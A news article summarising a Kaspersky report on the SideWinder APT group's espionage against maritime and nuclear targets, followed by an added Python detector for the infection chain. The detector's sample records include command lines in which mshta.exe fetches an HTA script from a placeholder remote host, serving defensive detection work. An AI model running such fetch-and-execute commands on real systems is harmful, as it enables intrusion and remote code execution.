
Infection flow | Image: Kaspersky Labs
The SideWinder Advanced Persistent Threat (APT) group has expanded its cyber-espionage operations, targeting the maritime and nuclear sectors with an evolved malware arsenal and enhanced persistence techniques. According to a new report from Kaspersky Labs, the group has been aggressively broadening its operations, particularly in South and Southeast Asia, the Middle East, and Africa.
Kaspersky researchers have been tracking SideWinder’s activities throughout 2024 and observed an increasing number of attacks on maritime infrastructures and logistics companies. The group also demonstrated a heightened interest in nuclear power plants and energy-related institutions.
“We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems,” the report states.
While SideWinder’s historical targets have included government and military entities in Pakistan, Sri Lanka, China, and Nepal, its recent operations suggest a broader strategic interest in critical industries.
SideWinder is constantly refining its attack methodologies to stay ahead of security software. Kaspersky’s analysis reveals that the group:
- Rapidly modifies its malware once detected, often deploying new versions within five hours.
- Employs sophisticated persistence mechanisms, including modifying file paths, renaming malicious files, and evading sandbox detection.
- Adapts behavioral tactics in response to detection, engaging in a “ping-pong” game with cybersecurity researchers.
SideWinder relies on spear-phishing as its primary infection vector. The group delivers malicious DOCX files that exploit the CVE-2017-11882 vulnerability, an old but effective flaw in Microsoft Office’s Equation Editor. The infection chain includes:
- A remote template injection attack, downloading a weaponized RTF document.
- Execution of malicious shellcode, leading to the installation of the Backdoor Loader.
- Deployment of “StealerBot”, a post-exploitation toolkit used exclusively by the group.
The lure documents appear legitimate, often related to:
- Nuclear power plants and energy agencies.
- Maritime authorities and logistics infrastructure.
- Governmental and diplomatic entities.
The Backdoor Loader acts as a foothold for the StealerBot implant, which facilitates:
- Data exfiltration and espionage.
- Network reconnaissance and privilege escalation.
- Persistence within compromised infrastructures.
To further avoid detection, SideWinder employs a JavaScript loader, which:
- Runs in two stages, checking RAM size and installed security software before proceeding.
- Uses the mshta.exe Windows utility to retrieve payloads from a remote attacker-controlled server.
- Embeds heavily obfuscated JavaScript code, making analysis difficult.
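The infection chain and the JavaScript loader described above leave two observable traces on an endpoint that a defender can alert on: the Office Equation Editor (the component patched by CVE-2017-11882) launching a child process, which it never does legitimately, and mshta.exe being handed a remote URL. The following detector is an added example written for this article, not code from Kaspersky or from the report; it runs over constructed Sysmon-style process-creation records in a made-up `Key=Value|Key=Value` format, and it assumes the Equation Editor binary name EQNEDT32.EXE and the Word binary name WINWORD.EXE. It generalizes slightly beyond the text by also flagging mshta.exe spawned directly from Word.

```python
"""Detection sketch for the infection chain described in the article.

Added example (not the report's code).  Scans Sysmon-style process-creation
records for two observable stages of the chain:
  1. the Equation Editor (CVE-2017-11882 target) spawning any child process,
  2. mshta.exe retrieving content from a remote URL.
"""
import re
from dataclasses import dataclass

# Assumed binary names.  Equation Editor is started out-of-process via DCOM,
# so its parent is normally svchost.exe rather than Word; the reliable signal
# is EQNEDT32.EXE having a child at all, not who launched it.
EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_APPS = {"winword.exe"}
MSHTA = "mshta.exe"
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' record."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcessEvent(
        image=fields.get("Image", ""),
        parent_image=fields.get("ParentImage", ""),
        command_line=fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    image = basename(event.image)
    parent = basename(event.parent_image)
    if parent == EQUATION_EDITOR:
        # Shellcode stage: the exploited Equation Editor launches a process.
        hits.append("equation_editor_child_process")
    if image == MSHTA and REMOTE_URL.search(event.command_line):
        # Loader stage: mshta.exe pulls its script from an external server.
        hits.append("mshta_remote_url")
    if image == MSHTA and parent in OFFICE_APPS:
        # Extra rule beyond the text: a document driving mshta.exe directly.
        hits.append("office_spawns_mshta")
    return hits


def scan(lines):
    """Return [(record_number, [rule, ...]), ...] for every matching record."""
    findings = []
    for number, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        hits = classify(parse_event(line))
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample records; every path and the example.invalid host are
# placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    r"Image=C:\Office\WINWORD.EXE|ParentImage=C:\Windows\explorer.exe|CommandLine=WINWORD.EXE /n invitation.docx",
    r"Image=C:\Shared\EQUATION\EQNEDT32.EXE|ParentImage=C:\Windows\System32\svchost.exe|CommandLine=EQNEDT32.EXE -Embedding",
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Shared\EQUATION\EQNEDT32.EXE|CommandLine=cmd.exe /c start mshta.exe",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=mshta.exe http://stage.example.invalid/loader.hta",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Users\u\local.hta",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Office\WINWORD.EXE|CommandLine=mshta.exe https://stage.example.invalid/a.hta",
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_EVENTS):
        print(f"record {number}: {', '.join(hits)}")
```

The first two records (Word opening a document, Equation Editor starting under DCOM) are deliberately benign so that the rules fire on the behaviour the article describes rather than on the mere presence of these binaries; record 5 shows that a locally sourced HTA is not flagged by the remote-URL rule.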
While SideWinder has previously attacked government and military entities, its recent focus on maritime and nuclear infrastructure highlights a shift towards critical industries.
“We noticed a new and significant increase in attacks against maritime infrastructures and logistics companies… We observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia,” the report concludes.